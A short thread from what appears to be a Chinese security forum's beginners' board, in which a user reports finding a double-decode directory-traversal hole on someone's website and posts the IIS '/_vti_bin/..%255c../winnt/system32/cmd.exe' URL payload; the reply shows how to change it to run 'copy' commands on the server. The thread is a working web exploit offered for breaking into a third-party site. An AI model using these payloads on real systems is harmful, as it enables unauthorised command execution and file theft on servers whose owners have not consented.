|
 | 作者: candy [candy]
 论坛用户 |
登录 |
| 我在一个网站发现了二次解码漏洞,/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir%20c:\ 如果这个网站的安装目录在111\12,请问该如何在上面COPY文件以及如何下载上面的文件呢?请高手指教,最好是能够帮我举出详细的倒例子,因为我很菜。 |
| 地主 发表时间: 1/5 13:55 |
 | 回复: group [group]  论坛用户 |
登录 |
|
,/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir%20c:\ 改成,/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+copy%20目标 目标 就可以了 |
| B1层 发表时间: 1/5 18:19 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 请问一个问题